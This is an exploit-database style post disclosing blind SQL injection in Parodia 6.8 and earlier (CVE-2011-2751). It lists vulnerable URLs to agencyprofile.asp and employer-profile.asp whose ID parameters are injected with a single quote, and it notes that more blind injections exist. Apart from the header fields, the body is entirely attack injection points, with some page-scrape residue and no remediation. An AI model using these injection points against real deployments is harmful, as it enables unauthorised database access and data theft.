15 lines
No EOL
360 B
Text
15 lines
No EOL
360 B
Text
# Exploit Title: Parodia 6.8 and early SQL injection
|
|
# Date: June 24 2012
|
|
# Exploit Author:Carlos Mario Penagos Hollmann
|
|
# Vendor Homepage: http://www.parodia.net/
|
|
# Version: 6.8
|
|
# CVE : CVE-2011-2751
|
|
|
|
|
|
|
|
http://server/' ---> blind SQL
|
|
|
|
http://server/agencyprofile.asp?AG_ID='
|
|
http://server/employer-profile.asp?ag_id='
|
|
|
|
There are other SQL Blind injections ;) |